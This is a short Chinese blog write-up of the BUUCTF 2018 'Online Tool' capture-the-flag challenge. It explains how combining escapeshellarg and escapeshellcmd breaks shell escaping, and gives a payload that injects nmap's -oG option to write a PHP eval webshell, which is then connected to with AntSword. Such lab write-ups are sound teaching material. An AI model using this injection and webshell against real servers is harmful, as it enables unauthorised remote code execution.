[BUUCTF 2018]Online Tool

在这里插入图片描述
一段php审计下吧,不存在get参数host时高亮显示代码,不管先传个host看看

在这里插入图片描述
sandbox后面的值经过了md5,往下审计时发现俩个函数 escapeshellarg和escapeshellcmd

在这里插入图片描述
在这里插入图片描述
escapeshellarg将字符串转码可以在shell中使用的参数

在这里插入图片描述
两个函数一起使用时就出现了问题

在这里插入图片描述
执行命令时\解释为\不再是转译字符,所有的过滤都没有什么作用了
再往下审计有system命令,执行了nmap的命令这时第一个想到的就是写webshell啊擦
用nmap的-oG写文件
payload

?host='<?php @eval($_POST["c7ay"]);?> -oG c7ay.php'

蚁剑连一下找flag

在这里插入图片描述

专注,勤学,慎思。戒骄戒躁,谦虚谨慎

  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值